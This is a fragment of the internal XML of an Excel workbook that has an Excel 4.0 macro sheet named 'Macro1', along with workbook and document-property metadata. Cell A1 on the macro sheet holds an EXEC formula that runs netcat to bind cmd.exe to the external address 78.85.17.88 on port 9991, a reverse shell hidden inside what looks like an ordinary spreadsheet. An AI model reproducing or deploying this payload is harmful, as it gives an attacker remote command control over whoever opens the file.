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bbe0fec9fe4db2b/Рабочий стол/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{431EB14E-7778-4752-91C6-DD1B7DE5A2D6}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="17520" windowHeight="12600" xr2:uid="{059C6125-378D-4467-AE06-2E526D8377F6}"/>
  </bookViews>
  <sheets>
    <sheet name="Macro1" sheetId="2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A17A0-63C0-4C8D-B312-2B5FD1769157}">
  <dimension ref="A1:A2"/>
  <sheetViews>
    <sheetView showFormulas="1" tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="35.5703125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1">
        <f>EXEC("nc.exe -e cmd.exe 78.85.17.88 9991")</f>
        <v>33</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.2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C0D3F-4B98-44CA-BF53-91530E9B214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QuietMoth1</dc:creator>
  <cp:lastModifiedBy>Илья Караваев</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-28T13:43:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-28T15:39:11Z</dcterms:modified>
</cp:coreProperties>
</file>